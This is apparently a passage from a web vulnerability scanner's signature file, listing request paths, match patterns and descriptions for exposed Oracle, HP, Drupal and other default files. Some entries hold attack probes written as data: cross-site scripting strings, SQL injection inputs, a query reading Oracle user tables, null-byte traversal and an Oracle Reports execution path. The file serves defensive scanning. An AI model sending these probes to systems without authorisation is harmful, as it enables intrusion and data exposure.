"003421","CWE-552","13","/bmp/global-web-application.xml","GET","200","","","","","SQLJ Demo Application","","" "003422","CWE-552","13","/bmp/JSPClient.java","GET","200","","","","","SQLJ Demo Application","","" "003423","CWE-552","13","/bmp/mime.types","GET","200","","","","","SQLJ Demo Application","","" "003424","CWE-552","13","/bmp/README.txt","GET","200","","","","","SQLJ Demo Application","","" "003425","CWE-552","13","/bmp/sqljdemo.jsp","GET","200","","","","","SQLJ Demo Application","","" "003426","CWE-552","13","/bmp/setconn.jsp","GET","200","","","","","SQLJ Demo Application","","" "003427","CWE-552","13","/ptg_upgrade_pkg.log","GET","200","","","","","Oracle log files.","","" "003428","CWE-552","13","/OA_HTML/oam/weboam.log","GET","200","","","","","Oracle log files.","","" "003429","CWE-552","1","/webapp/admin/_pages/_bc4jadmin/","GET","200","","","","","Oracle JSP files","","" "003430","CWE-552","1","/_pages/_webapp/_admin/_showpooldetails.java","GET","200","","","","","Oracle JSP files","","" "003431","CWE-552","1","/_pages/_webapp/_admin/_showjavartdetails.java","GET","200","","","","","Oracle JSP file","","" "003432","CWE-552","1","/_pages/_demo/","GET","200","","","","","Oracle JSP file","","" "003433","CWE-552","1","/_pages/_webapp/_jsp/","GET","200","","","","","Oracle JSP file.","","" "003434","CWE-552","1","/_pages/_demo/_sql/","GET","200","","","","","Oracle JSP file.","","" "003435","CWE-552","13","/OA_HTML/_pages/","GET","200","","","","","Oracle JSP file.","","" "003436","CWE-552","13","/OA_HTML/webtools/doc/index.html","GET","200","","","","","Cabo DHTML Components Help Page","","" "003437","https://www.exploit-db.com/exploits/26006","8","/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF","GET","200","","","","","Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution","","" "003438","CWE-552","1","/apex/","GET","200","","","","","Oracle Application Express login screen.","","" "003439","CWE-552","1b","/OA_JAVA/","GET","200","","","","","Oracle Applications Portal Page","","" "003440","CWE-552","1b","/OA_HTML/","GET","200","","","","","Oracle Applications Portal Page","","" "003441","CWE-552","1b","/aplogon.html","GET","200","","","","","Oracle Applications Portal Page","","" "003442","CWE-552","1b","/appdet.html","GET","200","","","","","Oracle Applications Portal Pages","","" "003443","CWE-552","1b","/servlets/weboam/oam/oamLogin","GET","200","","","","","Oracle Application Manager","","" "003444","CWE-552","1b","/OA_HTML/PTB/mwa_readme.htm","GET","200","","","","","Oracle Mobile Applications Industrial Server administration and configuration interface","","" "003445","CWE-552","1b","/reports/rwservlet","GET","200","","","","","Oracle Reports","","" "003446","CWE-552","1b","/reports/rwservlet/showenv","GET","200","","","","","Oracle Reports","","" "003447","CWE-552","1b","/reports/rwservlet/showmap","GET","200","","","","","Oracle Reports","","" "003448","CWE-552","1b","/reports/rwservlet/showjobs","GET","200","","","","","Oracle Reports","","" "003449","CWE-552","1b","/reports/rwservlet/getjobid7?server=myrep","GET","200","","","","","Oracle Reports","","" "003450","CWE-552","1b","/reports/rwservlet/getjobid4?server=myrep","GET","200","","","","","Oracle Reports","","" "003451","CWE-552","1b","/reports/rwservlet/showmap?server=myserver","GET","200","","","","","Oracle Reports","","" "003452","","1a","/pls/portal/owa_util.cellsprint?p_theQuery=select","GET","200","","","","","Direct access to Oracle packages could have an unknown impact.","","" "003453","","1a","/pls/portal/owa_util.listprint?p_theQuery=select","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003454","","1a","/pls/portal/owa_util.show_query_columns?ctable=sys.dba_users","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003455","","1a","/pls/portal/owa_util.showsource?cname=owa_util","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003456","","1a","/pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003457","","1a","/pls/portal/owa_util.signature","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003458","","1a","/pls/portal/HTP.PRINT","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003459","","1a","/pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003460","","1a","/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003461","","1a","/pls/portal/PORTAL.wwv_form.genpopuplist","GET","200","","","","","Access to Oracle pages cold have an unknown impact.","","" "003462","","1a","/pls/portal/PORTAL.wwv_ui_lovf.show","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003464","","1a","/pls/portal/PORTAL.wwv_dynxml_generator.show","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003465","","1a","/pls/portal/PORTAL.home","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003467","","1a","/pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003468","","1a","/pls/portal/SELECT","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003469","","1a","/pls/portal/null","GET","200","","","","","Access to Oracle pages could have an unknown impact.","","" "003470","","1b","/OA_MEDIA/","GET","200","","","","","Oracle Applications portal pages found.","","" "003471","","1b","/OA_HTML/META-INF/","GET","200","","","","","Oracle Applications portal pages found.","","" "003472","","1b","/OA_HTML/jsp/por/services/login.jsp","GET","200","","","","","Oracle Applications portal pages found.","","" "003473","","1b","/OA_HTML/PTB/ICXINDEXBASECASE.htm","GET","200","","","","","Oracle Applications portal pages found.","","" "003474","","1b","/OA_HTML/PTB/ECXOTAPing.htm","GET","200","","","","","Oracle Applications portal pages found.","","" "003475","","1b","/OA_HTML/PTB/xml_sample1.htm","GET","200","","","","","Oracle Applications portal pages found.","","" "003476","","1b","/OA_HTML/jsp/wf/WFReassign.jsp","GET","200","","","","","Oracle Applications portal pages found.","","" "003477","","1b","/OA_JAVA/Oracle/","GET","200","","","","","Oracle Applications portal pages found.","","" "003478","","1b","/OA_JAVA/servlet.zip","GET","200","","","","","Oracle Applications portal pages found.","","" "003479","","1b","/OA_JAVA/oracle/forms/registry/Registry.dat","GET","200","","","","","Oracle Applications portal pages found.","","" "003480","","1b","/OA_HTML/oam/","GET","Oracle Access Manager","","","","","Oracle Applications portal pages found.","","" "003481","CWE-552","1b","/OA_HTML/jsp/","GET","200","","","","","Oracle Applications portal page found","","" "003482","CWE-552","1b","/OA_HTML/jsp/fnd/fndversion.jsp","GET","200","","","","","Oracle Applications help page found.","","" "003483","CWE-552","1b","/OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc","GET","200","","","","","Oracle Applications help page found.","","" "003484","CWE-552","1b","/OA_HTML/jsp/fnd/fndhelputil.jsp","GET","200","","","","","Oracle Applications help page found.","","" "003485","","1","/install/install.php","GET","200","","","","","Install file found.","","" "003486","CVE-2000-0114","3","/_vti_bin/shtml.dll/_vti_rpc","POST","The user","","","","","The anonymous FrontPage user is revealed through a crafted POST.","method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f","" "003487","","3","/cehttp/trace","GET","200","","","","","Sterling Commerce Connect Direct trace log file may contain user ID information.","","" "003488","","3","/cehttp/property/","GET","200","","","","","Sterling Commerce Connect Direct configuration files.","","" "003489","","b","/webdav/index.html","GET","WebDAV support","","","","","WebDAV support is enabled.","","" "003490","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/hp-ux/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003491","","13b","/hp_docs/","GET","web server suite","","","","","HP-UX Web Server Suite was found.","","" "003492","","13b","/hp_docs/cgi-bin/index.cgi","GET","web server suite","","","","","HP-UX Web Server Suite was found.","","" "003493","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/hp_docs/xmltools/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. HP-UX Web Server Suite xml tools.","","" "003494","","3","@CGIDIRSshowuser.cgi","GET","Username","","","","","Shows the output of the 'whoami' command, which shows the web server user.","","" "003495","","1","@CGIDIRSman2html","GET","manual page","","","","","Gateway to Unix man pages.","","" "003496","","3","/status?full=true","GET","Tomcat Status","","","","","Apache Tomcat and/or JBoss information page.","","" "003497","CVE-2007-3685","4","/rpc.php?q=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.","","" "003499","CVE-2007-3684","9","/db.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar db.php is vulnerable to SQL injection in the q and t variables.","","" "003500","CVE-2007-3684","9","/rpc.php?q='&t='","GET","MySQL server version","","","","","Unobtrusive Ajax Star Rating Bar rpc.php is vulnerable to SQL injection in the q and t variables.","","" "003501","CWE-552","b","/junk.cfm","GET","BlueDragon Time","","","","","Server is running BlueDragon from New Atlanta for CFML processing.","","" "003502","CWE-552","1","/jsp-examples/","GET","Java Server Pages","","","","","Apache Java Server Pages documentation.","","" "003503","CWE-552","b","/nps/iManager.html","GET","Novell,\sInc","","","","","Novell iManager found.","","" "003504","CWE-552","3b","/nps/version.jsp","GET","Novell,\sInc","","","","","Novell iManager version found.","","" "003505","CWE-552","3b","/nps/servlet/webacc?taskId=dev.Empty&merge=fw.About","GET","Novell,\sInc","","","","","Novell iManager version found.","","" "003506","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/doc/Judy/demo/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. HP Judy language demos.","","" "003508","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/doc/vxvm/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. HP help documentation.","","" "003509","CWE-552","2","/doc/PRINTER-JPN-S","GET","HPDPS","","","","","HP DPS","","" "003510","CWE-552","2","/doc/PRINTER-JPN-E","GET","HPDPS","","","","","HP DPS","","" "003511","CWE-552","2","/doc/NTP_Primer.txt","GET","Network Time","","","","","HP server documentation.","","" "003512","CWE-552","2","/doc/LICENSE.SMAIL893","GET","license terms","","","","","HP server license document.","","" "003513","CWE-552","2","/doc/PRINT-ASE-NOTE","GET","Obsolescence","","","","","HP server documentation.","","" "003514","CWE-552","2","/doc/SETNETLP_Guide-E","GET","Configurable Parameters","","","","","HP server documentation.","","" "003515","CWE-552","2","/doc/SETNETLP_Guide-S","GET","Configurable Parameters","","","","","HP server documentation.","","" "003516","CWE-552","2","/doc/dir.perm.txt","GET","part of this patch","","","","","HP server documentation.","","" "003517","CWE-552","2","/doc/ASX-UTF8","GET","Asian System","","","","","HP server documentation.","","" "003518","CWE-552","2","/doc/ASX-TCH","GET","Release Note","","","","","HP server documentation.","","" "003519","CWE-552","2","/doc/ASX-SCH","GET","Release Note","","","","","HP server documentation.","","" "003520","CWE-552","2","/doc/ASX-KOR","GET","Release Note","","","","","HP server documentation.","","" "003521","CWE-552","2","/doc/ASX-JPN-S","GET","Asian-Core","","","","","HP server documentation.","","" "003522","CWE-552","2","/doc/ASX-JPN-E","GET","Asian-Core","","","","","HP server documentation.","","" "003523","CWE-552","2","/doc/ASX-JPN","GET","Release Note","","","","","HP server documentation.","","" "003524","CWE-552","2","/doc/11iSRB.txt","GET","Release Bulletin","","","","","HP server documentation.","","" "003525","CWE-552","2","/doc/11iRelNotes.txt","GET","Release Notes","","","","","HP server documentation.","","" "003526","CWE-552","2","/doc/11iRelNotes.html","GET","Release Notes","","","","","HP server documentation.","","" "003527","CWE-552","2","/doc/11.00RelNotes","GET","Release Notes","","","","","HP server documentation.","","" "003528","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/doc/Judy/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. HP server Judy documentation.","","" "003529","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/doc/TechPrtServ/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found. HP Documentation.","","" "003530","CWE-552","2","/doc/sw_patches.txt","GET","HP 9000 Series","","","","","HP server documentation.","","" "003531","CWE-552","2","/doc/Judy/COPYRIGHT","GET","Trademark Notice","","","","","HP server documentation.","","" "003532","CWE-552","2","/doc/Judy/Judy1_3x.htm","GET","Judy1 macros","","","","","HP server Judy documentation.","","" "003533","CWE-552","2","/doc/Judy/Judy1_funcs_3x.htm","GET","Judy1 functions","","","","","HP server Judy documentation.","","" "003534","CWE-552","2","/doc/Judy/JudyL_funcs_3x.htm","GET","Judy1 functions","","","","","HP server Judy documentation.","","" "003535","CWE-552","2","/doc/Judy/JudySL_funcs_3x.htm","GET","JudySL functions","","","","","HP server Judy documentation.","","" "003536","CWE-552","2","/doc/Judy/Judy_3x.htm","GET","Judy functions","","","","","HP server Judy documentation.","","" "003537","CWE-552","2","/doc/Judy/JudySL_3x.htm","GET","JudySL macros","","","","","HP server Judy documentation.","","" "003538","CWE-552","2","/doc/Judy/JudyL_3x.htm","GET","JudyL macros","","","","","HP server Judy documentation.","","" "003539","CWE-552","2","/doc/Judy/LICENSE","GET","Software License","","200","","","HP server Judy documentation.","","" "003540","CWE-552","2","/doc/Judy/demo/JudySort.c","GET","static char","","","","","HP server Judy code.","","" "003541","CWE-552","2","/doc/Judy/demo/Makefile","GET","libJudy\.a","","","","","HP server Judy code.","","" "003542","CWE-552","2","/doc/Judy/demo/funhist.c","GET","FUNCTION HISTOGRAM","","","","","HP server Judy code.","","" "003543","CWE-552","2","/doc/Judy/demo/interSL.c","GET","INTERACTIVE JUDYSL","","","","","HP server Judy code.","","" "003544","CWE-552","2","/doc/icodUserGuide.pdf","GET","200","","","","","Instant Capacity on Demand (iCOD) UserÃs Guide.","","" "003545","CWE-552","2","/doc/planning_SuperDome_configs.pdf","GET","200","","","","","Planning HP SuperDome Configurations","","" "003546","CWE-552","2","/doc/vxvm/pitc_ag.pdf","GET","200","","","","","VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.","","" "003547","CWE-552","2","/doc/Judy/Judy_tech_book.pdf","GET","200","","","","","HP Judy documentation found.","","" "003548","CWE-552","2","/doc/vxvm/vxvm_ag.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003549","CWE-552","2","/doc/vxvm/vxvm_hwnotes.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003550","CWE-552","2","/doc/vxvm/vxvm_ig.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003551","CWE-552","2","/doc/vxvm/vxvm_mig.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003552","CWE-552","2","/doc/vxvm/vxvm_tshoot.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003553","CWE-552","2","/doc/vxvm/vxvm_notes.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003554","CWE-552","2","/doc/vxvm/vxvm_ug.pdf","GET","200","","","","","Veritas Volume Manager documentation.","","" "003555","","1","/staging/","GET","200","","","","","This might be interesting.","","" "003556","","1","/_archive/","GET","200","","","","","Archive found.","","" "003557","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","12","/pdfs/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003558","","0","@FCKEDITOReditor/filemanager/upload/test.html","GET","Custom Uploader","","200","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003559","","0","@FCKEDITOReditor/dialog/fck_image.html","GET","Short Description","","200","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003560","","0","@FCKEDITOReditor/filemanager/browser/default/connectors/test.html","GET","Connector","","200","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003561","","0","@FCKEDITOReditor/dialog/fck_flash.html","GET","Preview","","200","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003562","","0","@FCKEDITOReditor/dialog/fck_link.html","GET","Link Properties","","200","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003563","","0","@FCKEDITOReditor/filemanager/browser/default/connectors/asp/connector.asp","GET","text editor for","","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "003564","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/crm/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003565","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/static/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003566","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/w3c/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003567","http://projects.webappsec.org/w/page/13246922/Directory%20Indexing","2","/dynamic/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Directory indexing found.","","" "003568","https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file","b","/update.php","GET","access_check","","","","","Drupal's update.php was found.","","" "003569","","1","/INSTALL.txt","GET","200","","","","","Default file found.","","" "003570","","1","/UPGRADE.txt","GET","200","","","","","Default file found.","","" "003571","https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-filehttps://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file","b","/install.php","GET","Drupal already installed","","","","","Drupal install.php file found.","","" "003572","","1","/install.php","GET","200","","","","","install.php file found.","","" "003573","","1b","/LICENSE.txt","GET","200","","","","","License file found may identify site software.","","" "003574","","1b","/upgrade.php","GET","200","","","","","upgrade.php was found.","","" "003575","","1","/xmlrpc.php","GET","200","","","","","xmlrpc.php was found.","","" "003576","","1b","/CHANGELOG.txt","GET","200","","","","","A changelog was found.","","" "003577","https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file","b","/INSTALL.mysql.txt","GET","CREATE THE","","","","","Drupal installation file found.","","" "003578","https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file","b","/INSTALL.pgsql.txt","GET","CREATE THE","","","","","Drupal installation file found.","","" "003579","https://drupal.stackexchange.com/questions/269076/how-do-i-restrict-access-to-the-install-php-file","b","/MAINTAINERS.txt","GET","CREATE THE","","","","","Drupal maintainers file found.","","" "003580","","23b","/sites/default/settings.php","GET","site-specific configuration","","","","","The Drupal settings.php file is sent in plain text not parsed by PHP. This file may contain a database connection string.","","" "003581","CVE-2007-5253","7","@CGIDIRSc32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf","GET","200","","","","","Cart32 contains a null byte directory traversal in the ImageName variable.","","" "003582","","3","/sitemap.gz","GET","200","","","","","The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.","","" "003583","","3","/content/sitemap.gz","GET","200","","","","","The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.","","" "003584","https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/","b","/icons/README","GET","Public Domain Icons","","","","","Apache default file found.","","" "003585","","b","/localstart.asp","GET","<title>Welcome to Windows","","","","","Default IIS install page found.","","" "003586","","b","/ampache/update.php","GET","Ampache Update","","","","","Ampache update page is visible.","","" "003587","","b","/ampache/login.php","GET","Ampache :: Pour l\'Amour de la Musique","","","","","Ampache is installed.","","" "003588","","b","/ampache/docs/README","GET","README - Ampache","","","","","Ampache installation documents found.","","" "003589","","b","/cgi-bin/webcgi/about","GET","\/cgi\/locale\/about_en\.xsl","","","","","Host seems to be a Dell Remote Access Controller (RAC).","","" "003590","","bd","/webservices/IlaWebServices","GET","200","","","","","Host has the Oracle iLearning environment installed.","","" "003591","","a","/SoundBridgeStatus.html","GET","200","","SoundBridge is running software version","","","Host is running the SoundBridge web server which doesn't support identification.","","" "003592","CVE-2009-1777","4b","@CGIDIRSFormMail.pl","GET","Version 1\.92","","","","","Matt Wright's FormMail 1.92 is vulnerable to HTTP response splitting, CRLF injection, and Cross-Site Scripting.","","" "003593","","1","/phone/","GET","200","","","","","This might be interesting.","","" "003594","","b","/Host/Portals/tabid/19/ctl/Login/portalid/0/Default.aspx","GET","txtUsername","","","","","DotNetNuke is running on the web server.","","" "003595","CVE-2005-4838","24","/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(111)</script>","GET","<script>alert\(111\)<\/script>","","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","","" "003596","CVE-2005-4838","24","/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(112)</script>","GET","<script>alert\(112\)<\/script>","","","","","The tomcat demo files are installed, which are vulnerable to an XSS attack","","" "003597","CVE-2005-4838","24","/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(113)</script>","GET","<script>alert\(113\)<\/script>","","","","","The Tomcat demo files are installed, which are vulnerable to an XSS attack","","" "003598","https://docs.microsoft.com/en-us/previous-versions/dotnet/articles/aa479045(v=msdn.10)?redirectedfrom=MSDN#aspplusvalid_clientside","b","/aspnet_files/","GET","403","","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","",".NET client side script files indicate .NET may be running.","","" "003599","","1","/Admin/","GET","200","Directory Listing Denied","","","","This might be interesting.","","" "003600","","1","/af/","GET","200","","","","","This might be interesting: potential country code (Afghanistan)","","" "003601","","1","/ax/","GET","200","","","","","This might be interesting: potential country code (Aland Islands)","","" "003602","","1","/al/","GET","200","","","","","This might be interesting: potential country code (Albania)","","" "003603","","1","/dz/","GET","200","","","","","This might be interesting: potential country code (Algeria)","","" "003604","","1","/as/","GET","200","","","","","This might be interesting: potential country code (American Samoa)","","" "003605","","1","/ad/","GET","200","","","","","This might be interesting: potential country code (Andorra)","","" "003606","","1","/ao/","GET","200","","","","","This might be interesting: potential country code (Angola)","","" "003607","","1","/ai/","GET","200","","","","","This might be interesting: potential country code (Anguilla)","","" "003608","","1","/aq/","GET","200","","","","","This might be interesting: potential country code (Antarctica)","","" "003609","","1","/ag/","GET","200","","","","","This might be interesting: potential country code (Antigua And Barbuda)","","" "003610","","1","/ar/","GET","200","","","","","This might be interesting: potential country code (Argentina)","","" "003611","","1","/am/","GET","200","","","","","This might be interesting: potential country code (Armenia)","","" "003612","","1","/aw/","GET","200","","","","","This might be interesting: potential country code (Aruba)","","" "003613","","1","/au/","GET","200","","","","","This might be interesting: potential country code (Australia)","","" "003614","","1","/at/","GET","200","","","","","This might be interesting: potential country code (Austria)","","" "003615","","1","/az/","GET","200","","","","","This might be interesting: potential country code (Azerbaijan)","","" "003616","","1","/bs/","GET","200","","","","","This might be interesting: potential country code (Bahamas)","","" "003617","","1","/bh/","GET","200","","","","","This might be interesting: potential country code (Bahrain)","","" "003618","","1","/bd/","GET","200","","","","","This might be interesting: potential country code (Bangladesh)","","" "003619","","1","/bb/","GET","200","","","","","This might be interesting: potential country code (Barbados)","","" "003620","","1","/by/","GET","200","","","","","This might be interesting: potential country code (Belarus)","","" "003621","","1","/be/","GET","200","","","","","This might be interesting: potential country code (Belgium)","","" "003622","","1","/bz/","GET","200","","","","","This might be interesting: potential country code (Belize)","","" "003623","","1","/bj/","GET","200","","","","","This might be interesting: potential country code (Benin)","","" "003624","","1","/bm/","GET","200","","","","","This might be interesting: potential country code (Bermuda)","","" "003625","","1","/bt/","GET","200","","","","","This might be interesting: potential country code (Bhutan)","","" "003626","","1","/bo/","GET","200","","","","","This might be interesting: potential country code (Bolivia)","","" "003627","","1","/ba/","GET","200","","","","","This might be interesting: potential country code (Bosnia And Herzegovina)","","" "003628","","1","/bw/","GET","200","","","","","This might be interesting: potential country code (Botswana)","","" "003629","","1","/bv/","GET","200","","","","","This might be interesting: potential country code (Bouvet Island)","","" "003630","","1","/br/","GET","200","","","","","This might be interesting: potential country code (Brazil)","","" "003631","","1","/io/","GET","200","","","","","This might be interesting: potential country code (British Indian Ocean Territory)","","" "003632","","1","/bn/","GET","200","","","","","This might be interesting: potential country code (Brunei Darussalam)","","" "003633","","1","/bg/","GET","200","","","","","This might be interesting: potential country code (Bulgaria)","","" "003634","","1","/bf/","GET","200","","","","","This might be interesting: potential country code (Burkina Faso)","","" "003635","","1","/bi/","GET","200","","","","","This might be interesting: potential country code (Burundi)","","" "003636","","1","/kh/","GET","200","","","","","This might be interesting: potential country code (Cambodia)","","" "003637","","1","/cm/","GET","200","","","","","This might be interesting: potential country code (Cameroon)","","" "003638","","1","/ca/","GET","200","","","","","This might be interesting: potential country code (Canada)","","" "003639","","1","/cv/","GET","200","","","","","This might be interesting: potential country code (Cape Verde)","","" "003640","","1","/ky/","GET","200","","","","","This might be interesting: potential country code (Cayman Islands)","","" "003641","","1","/cf/","GET","200","","","","","This might be interesting: potential country code (Central African Republic)","","" "003642","","1","/td/","GET","200","","","","","This might be interesting: potential country code (Chad)","","" "003643","","1","/cl/","GET","200","","","","","This might be interesting: potential country code (Chile)","","" "003644","","1","/cn/","GET","200","","","","","This might be interesting: potential country code (China)","","" "003645","","1","/cx/","GET","200","","","","","This might be interesting: potential country code (Christmas Island)","","" "003646","","1","/cc/","GET","200","","","","","This might be interesting: potential country code (Cocos (keeling) Islands)","","" "003647","","1","/co/","GET","200","","","","","This might be interesting: potential country code (Colombia)","","" "003648","","1","/km/","GET","200","","","","","This might be interesting: potential country code (Comoros)","","" "003649","","1","/cg/","GET","200","","","","","This might be interesting: potential country code (Congo)","","" "003650","","1","/cd/","GET","200","","","","","This might be interesting: potential country code (The Democratic Republic Of The Congo)","","" "003651","","1","/ck/","GET","200","","","","","This might be interesting: potential country code (Cook Islands)","","" "003652","","1","/cr/","GET","200","","","","","This might be interesting: potential country code (Costa Rica)","","" "003653","","1","/ci/","GET","200","","","","","This might be interesting: potential country code (CÔte D'ivoire)","","" "003654","","1","/hr/","GET","200","","","","","This might be interesting: potential country code (Croatia)","","" "003655","","1","/cu/","GET","200","","","","","This might be interesting: potential country code (Cuba)","","" "003656","","1","/cy/","GET","200","","","","","This might be interesting: potential country code (Cyprus)","","" "003657","","1","/cz/","GET","200","","","","","This might be interesting: potential country code (Czech Republic)","","" "003658","","1","/dk/","GET","200","","","","","This might be interesting: potential country code (Denmark)","","" "003659","","1","/dj/","GET","200","","","","","This might be interesting: potential country code (Djibouti)","","" "003660","","1","/dm/","GET","200","","","","","This might be interesting: potential country code (Dominica)","","" "003661","","1","/do/","GET","200","","","","","This might be interesting: potential country code (Dominican Republic)","","" "003662","","1","/ec/","GET","200","","","","","This might be interesting: potential country code (Ecuador)","","" "003663","","1","/eg/","GET","200","","","","","This might be interesting: potential country code (Egypt)","","" "003664","","1","/sv/","GET","200","","","","","This might be interesting: potential country code (El Salvador)","","" "003665","","1","/gq/","GET","200","","","","","This might be interesting: potential country code (Equatorial Guinea)","","" "003666","","1","/er/","GET","200","","","","","This might be interesting: potential country code (Eritrea)","","" "003667","","1","/ee/","GET","200","","","","","This might be interesting: potential country code (Estonia)","","" "003668","","1","/et/","GET","200","","","","","This might be interesting: potential country code (Ethiopia)","","" "003669","","1","/fk/","GET","200","","","","","This might be interesting: potential country code (Falkland Islands (malvinas))","","" "003670","","1","/fo/","GET","200","","","","","This might be interesting: potential country code (Faroe Islands)","","" "003671","","1","/fj/","GET","200","","","","","This might be interesting: potential country code (Fiji)","","" "003672","","1","/fi/","GET","200","","","","","This might be interesting: potential country code (Finland)","","" "003673","","1","/fr/","GET","200","","","","","This might be interesting: potential country code (France)","","" "003674","","1","/gf/","GET","200","","","","","This might be interesting: potential country code (French Guiana)","","" "003675","","1","/pf/","GET","200","","","","","This might be interesting: potential country code (French Polynesia)","","" "003676","","1","/tf/","GET","200","","","","","This might be interesting: potential country code (French Southern Territories)","","" "003677","","1","/ga/","GET","200","","","","","This might be interesting: potential country code (Gabon)","","" "003678","","1","/gm/","GET","200","","","","","This might be interesting: potential country code (Gambia)","","" "003679","","1","/ge/","GET","200","","","","","This might be interesting: potential country code (Georgia)","","" "003680","","1","/de/","GET","200","","","","","This might be interesting: potential country code (Germany)","","" "003681","","1","/gh/","GET","200","","","","","This might be interesting: potential country code (Ghana)","","" "003682","","1","/gi/","GET","200","","","","","This might be interesting: potential country code (Gibraltar)","","" "003683","","1","/gr/","GET","200","","","","","This might be interesting: potential country code (Greece)","","" "003684","","1","/gl/","GET","200","","","","","This might be interesting: potential country code (Greenland)","","" "003685","","1","/gd/","GET","200","","","","","This might be interesting: potential country code (Grenada)","","" "003686","","1","/gp/","GET","200","","","","","This might be interesting: potential country code (Guadeloupe)","","" "003687","","1","/gu/","GET","200","","","","","This might be interesting: potential country code (Guam)","","" "003688","","1","/gt/","GET","200","","","","","This might be interesting: potential country code (Guatemala)","","" "003689","","1","/gg/","GET","200","","","","","This might be interesting: potential country code (Guernsey)","","" "003690","","1","/gn/","GET","200","","","","","This might be interesting: potential country code (Guinea)","","" "003691","","1","/gw/","GET","200","","","","","This might be interesting: potential country code (Guinea-bissau)","","" "003692","","1","/gy/","GET","200","","","","","This might be interesting: potential country code (Guyana)","","" "003693","","1","/ht/","GET","200","","","","","This might be interesting: potential country code (Haiti)","","" "003694","","1","/hm/","GET","200","","","","","This might be interesting: potential country code (Heard Island And Mcdonald Islands)","","" "003695","","1","/va/","GET","200","","","","","This might be interesting: potential country code (Holy See (vatican City State))","","" 